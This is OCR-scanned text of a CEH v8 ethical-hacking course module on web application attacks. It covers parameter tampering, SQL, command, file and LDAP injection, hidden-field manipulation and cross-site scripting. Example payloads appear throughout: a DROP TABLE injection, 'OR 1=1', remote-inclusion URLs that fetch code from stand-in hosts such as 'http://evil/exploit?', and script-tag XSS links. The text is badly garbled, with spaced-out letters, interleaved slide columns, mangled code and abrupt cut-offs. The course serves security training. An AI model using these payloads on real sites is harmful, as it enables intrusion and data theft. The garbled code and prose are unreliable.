Académique Documents
Professionnel Documents
Culture Documents
H a c k in g W e b A p p lic a tio n s
M o d u le 13
E n g in e e re d b y H ackers. P r e s e n te d b y P ro fe s s io n a ls .
CEH
a
E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8
M o d u le 1 3 : H a c k in g W e b A p p lic a tio n s
E x a m 3 1 2 -5 0
S e c u r ity N e w s CEH
S e c u r i t y N e w s
X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e
a n d S e p t e m b e r , a n d o f f e r s a n im p r e s s io n o f t h e c u r r e n t i n t e r n e t s e c u r it y c lim a t e as a w h o le .
,S u p e r f e c t a ' a n d t h e y c o n s i s t o f C r o s s - s i t e S c r i p t i n g ( X S S ) , D i r e c t o r y T r a v e r s a l s , S Q L I n j e c t i o n s ,
a n d C r o s s - s i t e R e q u e s t F o r g e r y (C S R F ).
O n e o f t h e m o s t s i g n i f i c a n t c h a n g e s in a t t a c k t r a f f i c s e e n b y F ir e H o s t b e t w e e n Q 2 a n d Q 3 2 0 1 2
w a s a c o n s id e ra b le r is e in t h e n u m b e r o f c r o s s - s it e a t t a c k s , in p a r t i c u l a r XSS a n d CSRF a t t a c k s
rose to re p re se n t 64% o f th e g ro u p in t h e t h i r d q u a r t e r (a 2 8 % in c re a s e d p e n e t r a t i o n ) . X S S is
now th e m ost com m on a tta c k ty p e in th e S u p e rfe c ta , w ith CSRF n o w in second. F ire H o s t's
s e r v e r s b l o c k e d m o r e t h a n o n e m i l l i o n XSS a t t a c k s d u r i n g t h i s p e r i o d a lo n e , a f i g u r e w h i c h r o s e
M o d u le O b je c tiv e s CEH
M o d u l e O b j e c t i v e s
T h e m a i n o b j e c t i v e o f t h i s m o d u l e is t o s h o w t h e v a r i o u s k i n d s o f v u l n e r a b i l i t i e s t h a t
can be d is c o v e re d in w e b a p p l i c a t i o n s . T h e a t t a c k s e x p l o i t i n g t h e s e v u l n e r a b i l i t i e s a r e a ls o
h ig h lig h te d . T h e m o d u le s ta rts w it h a d e ta ile d d e s c rip tio n o f th e w e b a p p lic a tio n s . V a rio u s w e b
a p p lic a tio n th re a ts a re m e n tio n e d . The h a c k in g m e th o d o lo g y re v e a ls th e v a rio u s s te p s
i n v o l v e d in a p l a n n e d a t t a c k . T h e v a r i o u s t o o l s t h a t a t t a c k e r s u s e a r e d i s c u s s e d t o e x p l a i n t h e
w a y t h e y e x p l o i t v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s . T h e c o u n t e r m e a s u r e s t h a t c a n b e t a k e n t o
t h w a r t a n y s u c h a t t a c k s a r e a ls o h i g h l i g h t e d . S e c u r i t y t o o l s t h a t h e l p n e t w o r k a d m i n i s t r a t o r t o
m o n i t o r a n d m a n a g e t h e w e b a p p l i c a t i o n a r e d e s c r i b e d . F in a l ly w e b a p p l i c a t i o n p e n t e s t i n g is
d iscu sse d.
T h is m o d u l e f a m i l i a r i z e s y o u w i t h :
^־־ M o d u l e F l o w
Q W e b A p p C o n ce p ts
Q W e b A p p T h re a ts
© H a c k in g M e t h o d o lo g y
Q W e b A p p l i c a t i o n H a c k i n g T o o ls
© C o u n te rm e a s u re s
0 S e c u rity T o o ls
© W e b A p p P en T e s t i n g
Let us b e g in w i t h t h e W e b A p p c o n c e p ts .
Cross-Site Scripting
Information Leakage
f f W e b A p p l i c a t i o n S e c u r i t y S t a t is t ic s
~ S ource: h tt p s : / / w w w . w h it e h a t s e c . c o m
A c c o r d i n g t o t h e W H I T E H A T s e c u r i t y w e b s i t e s t a t i s t i c s r e p o r t in 2 0 1 2 , i t is c l e a r t h a t t h e c r o s s -
s ite s c r ip tin g v u ln e r a b ilitie s a re f o u n d on m o r e w e b a p p lic a tio n s w h e n com pa re d to o th e r
v u ln e ra b ilitie s . F ro m th e g ra p h y o u c a n o b s e r v e t h a t in t h e y e a r 2 0 1 2 , c r o s s - s i t e s c r i p t i n g
v u l n e r a b i l i t i e s a r e t h e m o s t c o m m o n v u l n e r a b i l i t i e s f o u n d in 5 5 % o f t h e w e b a p p l i c a t i o n s . O n l y
1 0 % o f w e b a p p l i c a t i o n a t t a c k s a r e b a s e d o n i n s u f f i c i e n t s e s s i o n e x p i r a t i o n v u l n e r a b i l i t i e s . In
o rd e r to m in im iz e th e ris k s a s s o c i a t e d w ith c ro s s -s ite s c rip tin g v u ln e ra b ilitie s in t h e web
a p p lic a tio n s , y o u have t o a d o p t n e ce s sa ry c o u n te r m e a s u re s a g a in s t th e m .
W e b a p p lic a t io n s p r o v id e a n in t e r f a c e b e t w e e n
T h o u g h w e b a p p lic a t io n s e n fo r c e c e r ta in
e n d u s e rs a n d w e b s e rv e rs th r o u g h a s e t o f
s e c u r ity p o lic ie s , th e y a re v u ln e r a b le
w e b p a g e s t h a t a re g e n e ra te d a t t h e
t o v a r io u s a tta c k s s u c h as SQL
s e rv e r e n d o r c o n t a in s c r ip t c o d e t o
in je c tio n , c ro s s -s ite s c r ip tin g ,
b e e x e c u te d d y n a m ic a lly w it h in
s e s s io n h ija c k in g , e tc .
\
t h e c lie n t w e b b r o w s e r
* ,
W e b a p p l i c a t io n s a n d W e b 2 .0
N e w w e b te c h n o lo g ie s s u c h as
t e c h n o lo g ie s a r e i n v a r i a b l y u s e d t o
W e b 2 .0 p r o v id e m o r e a tta c k
s u p p o r t c r it ic a l b u s in e s s f u n c t i o n s
s u rfa c e f o r w e b a p p lic a t io n
s u c h a s C R M , S C M , e tc . a n d i m p r o v e
e x p lo ita tio n
b u s in e s s e f f ic ie n c y
W e b A p p lic a t io n C o m p o n e n ts C E H
Urtifwd itfcMjl NMhM
IS
^ W e b A p p lic a tio n C o m p o n e n ts
Login: M o s t o f th e w e b s ite s a llo w a u th e n tic users to access th e a p p lic a tio n by m eans o f lo gin. It
m eans th a t to access th e service o r c o n te n t o ffe re d by th e w e b a p p lic a tio n user needs to
s u b m it h is /h e r use rn a m e and passw ord. Exam ple g m a il.co m
Session Tracking Mechanism: Each w e b a p p lic a tio n has a session tra c k in g m e ch a n ism . The
session can be tra c k e d by using cookies, URL re w ritin g , o r Secure Sockets Layer (SSL)
in fo rm a tio n .
Data Access: U sually th e w e b pages w ill be c o n ta c tin g w ith each o th e r via a data access lib ra ry
in w h ic h all th e data b a se d e ta ils are s to re d .
H o w W e b A p p lic a t io n s W o r k C E H
ID Topic News
SE LE C T * fro m new s w h e re id = 6329
6329 Tech CNN
O u tp u t
H o w W e b A p p lic a tio n s W o rk
W e b A p p lic a t io n A r c h it e c t u r e C E H
y ^ l ln t e m e r N
( W eb
S e rv ic e s
Clients Business Layer
A p p lic a tio n S e rv e r
Legacy Application
Data Access
P re s e n ta tio n L a y e r
ה
Firew all
Proxy Server,
H TTP R e q u e s t P arse r Cache
S e rv le t R e so u rc e A u th e n tic a t io n
C o n ta in e r H a n d le r a n d Lo gin
W e b 2 . 0 A p p l i c a t i o n s C E H
C«rt1fW4 itfciul NMkM
J W e b 2 .0 re fe rs t o a n e w g e n e r a tio n o f W e b a p p lic a t io n s t h a t p r o v id e a n in f r a s t r u c t u r e f o r m o r e d y n a m ic
u s e r p a r t ic ip a tio n , s o c ia l in t e r a c t io n a n d c o lla b o r a tio n
W e b 2 .0 A p p lic a t io n s
© RSS-generated s y n d ic a tio n
V u l n e r a b i l i t y S t a c k C E H
B u s in e s s L o g ic F la w s
C u s t o m W e b A p p li c a t i o n s
B _ T e c h n ic a l V u ln e r a b i l it ie s
T h ir d P a r t y C o m p o n e n t s
E l E O p e n S o u r c e / C o m m e r c ia l
D a ta b a s e f ^ ־w r O r a c le / M y S Q L / M S SQ L
W e b S e rv e r A p a c h e / M i c r o s o f t IIS
Apache
W i n d o w s / L in u x
O p e r a t i n g S y s te m
/OSX
N e tw o rk R o u t e r / S w it c h
S e c u r it y IPS / ID S
V u ln e r a b ilit y S ta c k
W e b A t t a c k V e c t o r s C E H
A n a t t a c k v e c t o r is a p a t h o r m e a n s b y w h ic h a n a t t a c k e r c a n g a in
w a c c e s s t o c o m p u t e r o r n e t w o r k r e s o u r c e s in o r d e r t o d e liv e r a n
a t t a c k p a y lo a d o r c a u s e a m a lic io u s o u t c o m e (
A t t a c k v e c t o r s i n c lu d e p a r a m e t e r m a n i p u la t i o n , X M L p o is o n in g ,
c lie n t v a li d a t i o n , s e r v e r m i s c o n f i g u r a t io n , w e b s e r v ic e r o u t in g
is s u e s , a n d c r o s s - s it e s c r ip t in g ־־־
S e c u r ity c o n t r o ls n e e d t o b e u p d a t e d c o n t in u o u s l y a s t h e a t t a c k
v e c t o r s k e e p c h a n g in g w it h r e s p e c t t o a t a r g e t o f a t t a c k
W e b A tta c k V e c to rs
0 X M L p o is o n in g : A tta c k e rs p ro v id e m a n ip u la te d XM L d o c u m e n ts th a t w h e n e xe cu te d can
d is tu rb th e logic o f p arsing m e th o d on th e server. W h e n huge XMLs are e xe cu te d a t th e
a p p lic a tio n layer, th e n th e y can be easily be c o m p ro m is e d by th e a tta c k e r to la u n ch his
o r h e r a tta c k and g a th e r in fo rm a tio n .
© C lie n t v a lid a tio n : M o s t c lie n t-s id e v a lid a tio n has to be s u p p o rte d by se rve r-side
a u th e n tic a tio n . The AJAX ro u tin e s can be easily m a n ip u la te d , w h ic h in tu rn m akes a w a y
fo r a tta c k e rs to h a n d le SQL in je c tio n , LDAP in je c tio n , etc. and n e g o tia te th e w e b
a p p lic a tio n 's key resources.
^־־ M o d u le F lo w
m Security Tools W e b A p p T h re a ts
W e b A p p lic a t io n T h r e a t s 1־ C E H
UrtiM Itkml Mstkm
In f o r m a t io n B ro k e n A c c o u n t
Leakage M anagem ent
C o o k ie Im p ro p e r
P o is o n in g S to ra g e E rro r H a n d lin g
W e b A p p lic a tio n T h re a ts -1
W e b a p p lic a tio n th re a ts are n o t lim ite d to a tta c k s based on URL and p o rt8 0 . D espite
using p o rts , p ro to c o ls , and th e OSI layer, th e in te g rity o f m is s io n -c ritic a l a p p lic a tio n s m u s t be
p ro te c te d fro m possible fu tu r e a ttacks. V e n d o rs who w ant to p ro te c t th e ir p ro d u c ts '
a p p lic a tio n s m u s t be able to deal w ith all m e th o d s o f a tta ck.
C o o k ie P o is o n in g
D ir e c to r y T r a v e r s a l
U n v a lid a te d I n p u t
W e b A p p lic a t io n T h r e a t s ■ 2 C E H
P la t fo r m
E x p lo its
In s e c u r e I n s u f f ic ie n t
׳V F a ilu re t o
D ir e c t O b je c t T ra n s p o rt L a ye r R e s tr ic t U R L
v 1־
R e fe r e n c e s P r o te c tio n Access
In s e c u r e
O b fu s c a tio n
C r y p to g r a p h ic
A p p lic a tio n
S to ra g e
S e c u r ity
DMZ
M anagem ent
P r o to c o l A tta c k s
E x p lo its
U n v a lid a te d
A u t h e n t ic a t io n W e b S e rv ic e s
R e d ir e c ts a n d
H ija c k in g A tta c k s
F o rw a rd s &
S e s s io n M a lic io u s
F ix a tio n A tt a c k F ile E x e c u tio n
P la tfo r m E x p lo its
V a rio u s w e b a p p lic a tio n s are b u ilt on by using d iffe r e n t p la tfo rm s such as BEA W e b logic and
C oldFusion. Each p la tfo rm has v a rio u s v u ln e ra b ilitie s and e x p lo its associated w ith it.
in In s e c u re D ir e c t O b je c t R e fe r e n c e s
§ W h e n v a rio u s in te rn a l im p le m e n ta tio n o b je c ts such as file , d ire c to ry , database
re c o rd , o r key are exposed th ro u g h a re fe re n c e by a d e v e lo p e r, th e n th e insecure d ire c t o b je c t
re fe re n c e takes place.
In s e c u re C r y p to g r a p h ic S to ra g e
U n v a l i d a t e d I n p u t C E H
In p u t v a lid a tio n fla w s re fe rs to a w e b a p p lica tio n An a tta c k e r e xplo its in p u t v a lid a tio n fla w s to
v u ln e ra b ility w h e re in p u t fr o m a c lie n t is n o t p e rfo rm c ro s s -s ite s c rip tin g , b u ffe r o v e rflo w ,
v a lid a te d b e fo re being processed by w e b in je c tio n a tta cks, etc. th a t re s u lt in d ata
a p p lica tio n s and backend servers t h e f t and s y s te m m a lfu n c tio n in g
Boy.com
D a ta b a s e
• B ro w s e r in p u t n o t
• v a lid a te d by th e w e b
: a p p lic a tio n
s t r i n g s q l — ,,s e l e c t * from U s e r s
h t t p : / / ju g g y b o y . c o m /lo g in . a sp x w here
? u s e r = ja s o n s 0 p a s s = s p r x n g fie ld u s e r = " י+ U s e r . T e x t + י יי
a n d p w d= ״ י+ P a s s w o r d .T e x t + « ! ״r
B ro w s e r Post R eq u e st M o d ifie d Q u e ry
U n v a lid a te d In p u t
ו
P a r a m e t e r / F o r m T a m p e r in g C E H
Urtifwd tlfcxjl lUthM
0 (D ® 1
| htp:/www.juggybank.com/cust.asp?profile=21&
debit=2500 < ........J■• T a m p e rin g w it h t h e |
URL p a ra m e te rs 1
0@ ® 1
| htp:/www.juggybank.com/cust.asp?profile=82&
debt=lSO
O < ........ J•■1...... .........
O t h e r p a r a m e te r s c a n
| http://w ww.juggybank.com /stat.asp?pg=531&status=view < ......... b e c h a n g e d in c lu d in g
a t t r i b u t e p a r a m e te r s
0 © ®
| http://w w w .juggybank.com /stat.asp?pg-147& status ־delete < ••••
P a ra m e te r/F o rm T a m p e r in g
r- •ייי■ ח
P a ra m e te r ta m p e rin g is a sim p le fo rm o f a tta c k a im e d d ire c tly a t th e a p p lic a tio n 's
business logic. This a tta c k takes a d va nta ge o f th e fa c t th a t m a n y p ro g ra m m e rs re ly on h id d e n
o r fix e d fie ld s (such as a h id d e n tag in a fo rm o r a p a ra m e te r in an URL) as th e o n ly s e c u rity
m easu re fo r c e rta in o p e ra tio n s . To bypass th is s e c u rity m echanism , an a tta c k e r can change
th e se p a ra m e te rs .
D i r e c t o r y T r a v e r s a l C E H
C«rt1fW4 itkiul Nm Im
v D ir e c to r y T ra v e rs a l
S e c u r it y M is c o n f ig u r a t io n C E H
Easy Exploitation
Using m isconfiguration vulnerabilities, attackers gain
u na u th o rize d accesses to d efa ult accounts, read
unused pages, e xplo it unpatched flaw s, and read o r
w rite unprotected files and directories, etc.
Common Prevalence
Security m isconfiguration can o ccur a t any level
o f an a p p lic a tio n stack, including th e p la tfo rm ,
w eb server, application server, fra m e w o rk, and
custom code
Example
e The application server admin console is automatically
installed and not removed
Default accounts are not changed
Attacker discovers the standard admin pages on server,
logs in w ith default passwords, and takes over
' ____ " D e velo pe rs and n e tw o rk a d m in is tra to rs sh ould check th a t th e e n tire stack is
c o n fig u re d p ro p e rly o r s e c u rity m is c o n fig u ra tio n can happe n a t any level o f an a p p lic a tio n
stack, in c lu d in g th e p la tfo rm , w e b server, a p p lic a tio n server, fra m e w o rk , and cu sto m code. For
instan ce, if th e se rve r is n o t c o n fig u re d p ro p e rly , th e n it re su lts in va rio u s p ro b le m s th a t can
in fe c t th e s e c u rity o f a w e b s ite . The p ro b le m s th a t lead to such instances in clu d e server
s o ftw a re fla w s , u n p a tc h e d s e c u rity fla w s, e n a b lin g unnecessary services, and im p ro p e r
a u th e n tic a tio n . A fe w o f th e se p ro b le m s can be d e te c te d easily w ith th e help o f a u to m a te d
scanners. A tta c k e rs can access d e fa u lt accounts, unused pages, u n p a tc h e d fla w s, u n p ro te c te d
file s and d ire c to rie s , etc. to gain u n a u th o riz e d access. A ll th e unnecessary and unsafe fe a tu re s
have to be ta k e n care o f and it proves v e ry b e n e ficia l if th e y are c o m p le te ly d isabled so th a t th e
o u ts id e rs d o n 't m ake use o f th e m fo r m a licio u s attacks. All th e a p p lic a tio n -b a s e d file s have to
be ta k e n care o f th ro u g h p ro p e r a u th e n tic a tio n and s tro n g s e c u rity m e th o d s o r crucial
in fo rm a tio n can be leaked to th e a tta cke rs.
I n j e c t i o n F l a w s C E H
In jectio n flaw s are w eb a pplication vulnerabilities th a t a llo w u n tru s te d data to be interpreted and executed
as part o f a com m and o r query
Attackers e xplo it injection fla w s by c o n s tru c tin g m alicious co m m an d s o r queries th a t result in data loss o r
co rrup tio n , lack o f accountability, o r denial o f access
Injection fla w s are p re va le n t in legacy code, o fte n fo u n d in SQL, LDAP, and XPath queries, etc. and can be
easily discovered by a pplication vu ln e ra bility scanners and fuzzers
SQL
S erver
J J
—
C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
In je c tio n F la w s
S Q L in je c tio n
* C o m m a n d in je c tio n
S Q L I n j e c t i o n A t t a c k s C E H
J SQL in je c tio n atta cks use a s e rie s o f m a lic io u s SQL q u e rie s to d ire c tly
m a n ip u la te th e d ata ba se
SQL injection
J An a tta cke r can use a v u ln e ra b le w e b a p p lic a tio n to bypass n o rm a l s e c u rity
attacks
m e asu re s and o b ta in d ire c t access to th e v a lu a b le data
J SQL in je c tio n atta cks can o fte n be executed fr o m th e a dd re ss b ar, fro m
w ith in a p p lic a tio n fie ld s , and th ro u g h queries and searches
01 <?php
02 fu n c tio n save e m a il( $ u s e r , $m essage)
W eb ....................... ■נ In te r n e t 03 {
B ro w s e r 04 $sql = "IN S E R T IN T O M e s s a g e s (
05 u s e r, m essage
06 ) V A LU E S (
07 ' $ u s e r1, ' $m essage'
t e s t ') ; D R O P T A B LE M e s s a g e s ; - -
08 )
09 re tu rn m y s q l_ q u e r y ( $ s q l) ;
W hen th is code is sent to th e d atabase
10 }
server, it d ro p s th e Messages ta b le
11 ?>
A tta c k e r t e s t ') , ( 'u s e r 2 ', '1 am J a s o n ' ) , ( ' u s e r3 ', 'Y o u a re hacked
N o te : For c o m p le te coverage o f SQL Injectio n concepts and techniques, refe r t o M o d u le 14: SQL Injectio n
S Q L In je c tio n A tta c k s
SQL in je c tio n a tta cks use c o m m a n d sequences fro m S tru c tu re d Q u e ry Language (SQL)
s ta te m e n ts to c o n tro l d atabase data d ire c tly . A p p lic a tio n s o fte n use SQL s ta te m e n ts to
a u th e n tic a te users to th e a p p lic a tio n , v a lid a te roles and access levels, sto re and o b ta in
in fo rm a tio n fo r th e a p p lic a tio n and user, and lin k to o th e r data sources. Using SQL in je c tio n
m e th o d s , an a tta c k e r can use a v u ln e ra b le w e b a p p lic a tio n to avoid n o rm a l s e c u rity m easures
and o b ta in d ire c t access to v a lu a b le data.
The reason w h y SQL in je c tio n atta cks w o rk is th a t th e a p p lic a tio n does n o t p ro p e rly v a lid a te
in p u t b e fo re passing it to a SQL s ta te m e n t. For e xa m p le , th e fo llo w in g SQL s ta te m e n t,
select * from ta b le n a m e where U ser1D = 2302 becom es th e fo llo w in g w ith a sim p le SQL
in je c tio n a tta c k :
SELECT * FROM ta b le n a m e WHERE U s e rID = 2302 OR 1=1
The expressio n "OR 1=1" eva lu a te s to th e va lu e "TRUE," o fte n a llo w in g th e e n u m e ra tio n o f all
user ID values fro m th e databa se. SQL in je c tio n a tta cks can o fte n be e n te re d fro m th e address
bar, fro m w ith in a p p lic a tio n fie ld s, and th ro u g h q u e rie s and searches. SQL in je c tio n atta cks can
a llo w an a tta c k e r to :
C o m m a n d I n je c t io n A t t a c k s C E H
J A n a tta c k e r tr ie s t o c r a f t a n in p u t s tr in g t o g a in s h e ll a cce ss t o a w e b s e rv e r
J S h e ll In je c t io n fu n c tio n s in c lu d e s y s t e m ( ) , s t a r t P r o c e s s ( ) ,
j a v a . l a n g . R u n t im e . e x e c ( ) , S y s t e m . D i a g n o s t i c s . P r o c e s s . S t a r t ( ) ,
a n d s im ila r A P Is
In H T M L e m b e d d in g a tta c k s , u s e r in p u t t o a w e b s c r ip t is p la c e d in t o t h e o u t p u t
H T M L , w it h o u t b e in g c h e c k e d f o r H T M L c o d e o r s c r ip t in g
J h t t p : / /w w w . j u g g y b o y . c o m / v u l n e r a b l e . p h p ? C O L O R = h t tp : / / e v i l / e x p l o i t ?
C o m m a n d In je c tio n A tta c k s
^= = 3 S h e ll I n j e c t i o n
1 To c o m p le te v a rio u s fu n c tio n a litie s , w e b a p p lic a tio n s use va rio u s a p p lic a tio n s and
p ro g ra m s. It is ju s t like se n d in g an em a il by using th e U N IX sendm ail p ro g ra m . T here is
a chance th a t an a tta c k e r m ay in je c t code in to th e se pro g ra m s. This kind o f a tta c k is d ange ro us
C o m m a n d I n je c t io n E x a m p le
M a lic io u s co de :
w w w . ju g g y b o y .c a m /b a im e r .g ifl|n e w p a s s w o r d ||1 0 3 6
^ J u g g y B o y c o m
|6 0 |4 6 8
Use r Nam e
C Addison
Email Address a d d i@ ju g g y b o y .c o ~
S An a tta cke r e n te rs m a lic io u s co de (a cco u n t נ
n u m b e r) w ith a n ew p a ssw o rd Site URL ^ w w w .juggyboy.com
כ
B a nn e r URL [ ■gif | |newpassword|1036|60|468
C o m m a n d In je c tio n E x a m p le
F i l e I n j e c t i o n A t t a c k C E H
<?php
GO $ d r in k = 'c o k e ';
if ( is s e t ( $ _ G E T [ 'D R IN K '] )
< form m e t h o d = " g e t"> $ d r iinn k = $ _ G ET [ 'D R IN K '] ;
< s e l e c t name="DRINK"> rr ee qq uu iirree (( J
$ d r in k . ' .p h p ’ ) ;
< o p t io n v a lu e = " p e p s i" > p e p s i< /o p t io n > ?>
< o p t io n v a lu e = " c o k e >ייco k e< / o p t i on>
< /s e le c t>
C in p u t t y p e ="s u b m it ">
< /fo r m >
ך : .....
C lie n t code ru n n in g in a b ro w s e r
h t t p : //w w w .j u g g y b o y .c o m /o r d e r s .p h p ? D R I N K = h t t p : / / j a s o n e v a l . c o m / e x p l o i t ? <
A tta c k e r
V u ln e ra b le PHP co de
<?php
$ d r in k = 'c o k e ';
W h a t I s L D A P I n j e c t i o n ? C E H
I (•rtifwtf itfciul ■UtlM
A n LD AP in je c tio n te c h n iq u e is u s e d t o ta k e a d v a n ta g e o f n o n - v a lid a te d w e b
a p p lic a t io n in p u t v u ln e r a b ilit ie s t o p ass L D A P f i l t e r s u s e d f o r s e a r c h in g D ir e c to r y
S e rv ic e s t o o b t a in d ir e c t a c c e s s t o d a ta b a s e s b e h in d a n L D A P t r e e
F ilte r
( a t t r ib u t e N a m e o p e ra to r v a lu e )
Syntax
LDAP D ire c to ry Services
s to re and organize O p e ra to r Example
in fo rm a tio n based on its
(*■ a ttrib u te s . The in fo rm a tio n = ( a b je c tc la s s = u s e r )
a. is hie ra rc h ic a lly organized
as a tre e o f d ire c to ry (m d b S to ra g e Q u o ta > = l00000)
WJ >=
entries
Q
(m d b S to ra g e Q u o ta < = l00000)
J <=
V)
•H p (d i s p 1ayName ~=Foecke1e r )
~=
(0 * (d isp la yN a m e —* J o h n * )
A LDAP is based on th e
N O T (!) ( fo b je c tC la s s = g ro u p )
W h a t is L D A P In je c tio n ?
H o w L D A P I n je c t io n W o r k s C E H
n
N orm al Q u e ry
N orm al Q u e ry + Code Injection
LDAP LDAP
N orm al Result N orm al Result a n d /o r
Add itio na l Inform ation
C lien t LDAP S erver C lient LDAP S erver
LDAP in je c tio n attacks are s im ila r to SQL in je c tio n a tta cks b u t e x p lo it u s e r p a ra m e te rs to g e n e ra te LDAP q u e ry
H o w L D A P In je c tio n W o rk s
(H U LDAP in je c tio n a tta cks are c o m m o n ly used on w e b a p p lic a tio n s . LDAP is a p p lie d to any
o f th e a p p lic a tio n s th a t have som e kind o f user in p u ts used to g e n e ra te th e LDAP qu e rie s. To
te s t if an a p p lic a tio n is v u ln e ra b le to LDAP code in je c tio n , send a q u e ry to th e se rve r th a t
g e n e ra te s an in v a lid in p u t. If th e LDAP se rve r re tu rn s an e rro r, it can be e x p lo ite d w ith code
in je c tio n te c h n iq u e s .
© Login Bypass
© In fo rm a tio n D isclosure
e P rivilege Escalation
H id d e n F ie ld M a n ip u la tio n A tta c k I C E H
N o rm a l R e q u e st
HTM L Code
h t tp : / /w w w . ju g g y b o
< f o m m ethod="post"
a c tio n ^ " p a g e .a sp x " > y . c o m /p a g e . a s p x ? p r
<in p u t typ e= " h id d en " name= o d u c t= J u g g y b o y % 2 O S A tta c k R eq u e st
"PRICE" v a l u e 200 . 0 0 " >" ־ h i r t & p r i c e = 2 0 0 .0 0
P r o d u ct name: < in p u t ty p e =
" t e x t ״nam e="product" h t t p : / /w w w . j u g g y b o
v a lu e ="Juggyboy S h i r t " X b r> y . c o m /p a g e . a s p x ? p r
P r o d u ct p r i c e : 2 0 0 .0 0 " X b r > o d u o t= J u g g y b o y % 2 0 S
< in p u t type=" subm it" v a lu e = h ir t & p r ic e = 2 . 00
" subm it" >
< /fo rm >
H id d e n F ie ld M a n ip u la tio n A tta c k
H idden m a n ip u la tio n a tta cks are m o s tly used against e ־c o m m e rc e w e b site s to d a y .
M a n y o n lin e stores face th e se p ro b le m s . In e ve ry c lie n t session, d e ve lo p e rs use h id d e n fie ld s to
s to re c lie n t in fo rm a tio n , in c lu d in g p rice o f th e p ro d u c t (In clu d in g d is c o u n t rates). A t th e tim e o f
d e v e lo p m e n t o f th e se such p ro g ra m s, d e ve lo p e rs fe e l th a t all th e a p p lic a tio n s d e ve lo p e d by
th e m are safe, b u t a hacker can m a n ip u la te th e prices o f th e p ro d u c t and c o m p le te a
tra n s a c tio n w ith price th a t he o r she has a lte re d , ra th e r th a n th e a ctual price o f th e p ro d u c t.
It o c c u rs w h e n in v a lid a te d in p u t d a ta is in c lu d e d in d y n a m ic c o n t e n t t h a t is s e n t t o a u s e r's w e b b r o w s e r
f o r r e n d e r in g
C r o s s - S ite S c r ip tin g (X S S ) A t t a c k s
C ross-site s c rip tin g is also called XSS. V u ln e ra b ilitie s o ccu r w h e n an a tta c k e r uses w e b
a p p lic a tio n s and sends m a licio u s code in JavaScript to d iffe re n t end users. It occurs w h e n
in v a lid a te d in p u t data is in c lu d e d in d y n a m ic c o n te n t th a t is se n t to a user's w e b b ro w s e r fo r
re n d e rin g . W h e n a w e b a p p lic a tio n uses in p u t fro m a user, an a tta c k e r can c o m m e n c e an
a tta c k using th a t in p u t, w h ic h can p ro p a g a te to o th e r users as w e ll. A tta c k e rs in je c t m a licio u s
JavaScript, V B S cript, A ctiveX , HTML, o r Flash fo r e x e c u tio n on a v ic tim 's system by h id in g it
w ith in le g itim a te requests. The end user m ay tru s t th e w e b a p p lic a tio n , and th e a tta c k e r can
e x p lo it th a t tru s t in o rd e r to do th in g s th a t w o u ld n o t be a llo w e d u n d e r n o rm a l c o n d itio n s . An
a tta c k e r o fte n uses d iffe r e n t m e th o d s to enco d e th e m a lic io u s p o rtio n (U nicode) o f th e tag, so
th a t a re q u e s t seem s g e n u in e to th e user. Som e o f th e m are:
H o w X S S A t t a c k s W o r k C E H
N o rm a l R e q u e st T h is e x a m p le u s e s a
ra b le p a g e w h ic h h a n d le s
f o r a n o n e x is t e n t p a g e s,
a c la s s ic 4 0 4 e r r o r p ag e
( H a n d le s r e q u e s ts f o r a
n o n e x is te n t p a g e , a
c la s s ic 4 0 4 e r r o r p a g e )
S e rv e r
S H o w X S S A tta c k s W o rk
N orm al Request
h t t p : / / ju g g y b o y .c o m / כa s o n _ f i l « . h t m l
/ j a s o n _ f i l e . h tm l
S e rv e r C ode (H an d les re q u e sts fo r a
S erver Response n o n e x is te n t page, a
< h fc m l> c las tic 4 0 A e r ro r p a g e )
<body>
< ? p hp
p r i n t "N ot fo u n d : "
XSS Attack Code u r ld e a o d e ($_SERVER["
REQUEST_URI"] ) ;
Server Response
?>
< /b o d y >
n
< /h t m l> Server
H i, Y o u h a v e w o n a U ser clicks
lo t t e r y o f $ 2 M , d ick th e m alicious link
t h e li n k t o c la im it.
<A
H R E F = h ttp ;//ju g g y b o y .
S e n d s e m a il w it h
c o m /....
m a lic io u s lin k
S e rve r se n d s a
Name: Shaun page to th e u ser
Age: 31 w i t h c lie n t p r o f ile
Location: UK
Occupation: SE
^ <..................
M a lic io u s c o d e is e x e c u t e d
Last visH: Sept 21,2010
o n t h e c lie n t w e b b r o w s e r
A tta c k e r
In th is exam ple, th e a tta cke r c ra fts an em ail m essage w ith a m alicious s c rip t and sends it to th e v ic tim :
<A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t io n . c g i? c lie n t p r o file = < S C R IP T >
m a lic io u s c o d e c /S C R I P T » C lic k h e re < /A >
In a crosssite s c rip tin g a tta c k via em a il, th e a tta c k e r cra fts an em a il th a t co n ta in s a lin k
to m a lic io u s s c rip t and sends it to th e v ic tim .
M a lic io u s S crip t:
<A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t i o n . c g i? c lie n t p r o f ile = < S C R I P T >
m a lic io u s c o d e < /S C R IP T » C lic k h e re < /A >
The fo llo w in g d ia g ra m d e p ic ts th e cross-site s c rip tin g a tta c k sce n a rio a tta c k via em a il:
X S S E x a m p le : A t t a c k v ia E m a il C E H
rrr 1
L e g itim a te
U s e r's M a lic io u s A tt a c k e r 's
S e rv e r
B ro w s e r S c r ip t S e rv e r
< A H R E F=h t t p : / / ju g g y b o y b a n k . c a n /
Mi
th e URL t o u s e r a nd c o n v in c e u s e r to c lic k on i t
_ R e q u e st th e page
o ......................!•
Page w it h m a lic io u s s c rip t
— Run
© .......
X S S E x a m p le : A tta c k v ia E m a il
X S S E x a m p le : S te a lin g U s e rs '
C E H
C o o k ie s
^ ^ vkV
i eieww th e page h o s te d Dy
by th e a tta c k e r
H TM L c o n ta in in g m a lic io u s s c r i p t !
»........................... ז......................© - !
Run
@
C o lle c t u s e r's c o o k ie s
X S S E x a m p le : S te a lin g U s e rs * C o o k ie s
To steal th e user's cookies w ith th e he lp o f an XSS a tta ck, th e a tta c k e r looks fo r XSS
vu n e ra b ilitie s and th e n insta lls a c o o k ie s te a le r (co o kie logger).
The fo llo w in g are th e v a rio u s steps in v o lv e d in ste a lin g user's cookies w ith th e help o f XSS
a tta c k :
XSS E x a m p le : S e n d in g a n
C E H
U n a u th o r iz e d R e q u e s t
A tt a c k e r 's
U s e r's M a lic io u s A tt a c k e r 's
S e rv e r
